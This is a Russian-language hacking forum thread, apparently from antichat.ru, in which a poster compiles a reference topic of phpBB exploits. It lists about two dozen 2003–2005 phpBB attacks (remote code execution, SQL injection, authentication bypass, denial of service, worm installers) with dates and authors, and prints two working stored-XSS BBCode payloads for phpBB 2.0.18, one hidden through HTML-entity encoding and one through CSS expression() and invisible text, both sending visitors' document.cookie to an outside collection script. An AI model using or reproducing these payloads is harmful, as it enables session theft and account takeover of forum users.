Так как помимо ipb, много вопросов есть и по phpbb форумам, я решил с позволения модеров создать эту тему, на которую можно будет ссылаться а не послать в поиск. Здесь я размещу всякие эксплойты и т.д. =) Будут выкладываться эксплойты для всех версий.
Вроде бы почти такая же тема уже есть и тоже в твоем исполнении=))) http://forum.antichat.ru/thread10398-phpbb.html
phpBB 2.0.13 (admin_styles.php) Remote Command Execution Exploit phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit) phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber) phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit phpBB 2.0.15 (highlight) Database Authentication Details Exploit phpBB 2.0.15 (highlight) Remote PHP Code Execution phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code) phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code) phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit phpBB <= 2.0.13 'downloads.php' mod Remote Exploit phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code) phpBB <= 2.0.12 Change User Rights Authentication Bypass phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2) phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial) phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm) Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search) phpBB highlight Arbitrary File Upload (Santy.A) PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled) phpBB v1.0.0 - 2.0.10 admin_cash.php remote exploit phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version) phpBB <= 2.0.10 Remote Command Execution Exploit phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit phpBB 2.0.4 Remote php File Include Exploit phpBB 2.0.5 SQL Injection password disclosure Exploit
phpBB 2.0.18 HTML: [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
2005-10-11 phpBB 2.0.13 (admin_styles.php) Remote Command Execution Exploit 6680 R D RusH 2005-07-19 phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit) 10311 R M D str0ke 2005-07-13 phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber) 5813 R D suBzero 2005-07-08 phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit 10273 R D D|ablo 2005-07-03 phpBB 2.0.15 (highlight) Database Authentication Details Exploit 11755 R M D SecureD 2005-06-29 phpBB 2.0.15 (highlight) Remote PHP Code Execution 7951 R M D rattle 2005-06-22 phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code) 4187 R D g30rg3_x 2005-06-22 phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code) 2684 R D HaCkZaTaN 2005-04-04 phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit 3803 R D CereBrums 2005-04-02 phpBB <= 2.0.13 'downloads.php' mod Remote Exploit 6635 R D CereBrums 2005-03-24 phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code) 4670 R D str0ke 2005-03-21 phpBB <= 2.0.12 Change User Rights Authentication Bypass 7392 R D Kutas 2005-03-11 phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2) 8675 R D Ali7 2005-03-05 phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial) 4825 R D PPC 2005-01-04 phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm) 2436 R D Severino Honorato 2004-12-25 Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search) 1717 R D n/a 2004-12-22 phpBB highlight Arbitrary File Upload (Santy.A) 1956 R D n/a 2004-12-17 PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled) 2184 R D overdose 2004-12-05 phpBB v1.0.0 - 2.0.10 admin_cash.php remote exploit 2279 R D evilrabbi 2004-12-03 phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version) 2372 R M D ZzagorR 2004-11-22 phpBB <= 2.0.10 Remote Command Execution Exploit 4447 R M D RusH 2003-12-21 phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit 2482 R D RusH 2003-06-30 phpBB 2.0.4 Remote php File Include Exploit 1735 R D Spoofed 2003-06-20 phpBB 2.0.5 SQL Injection password disclosure Exploit 2316 R D Rick Patel HTML: [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] Всем вам в помощь=))
Все кто хочет помочь в создании темы, баги в личку,тему в топку. Скоро будет созданы темы-баглисты типа этого.
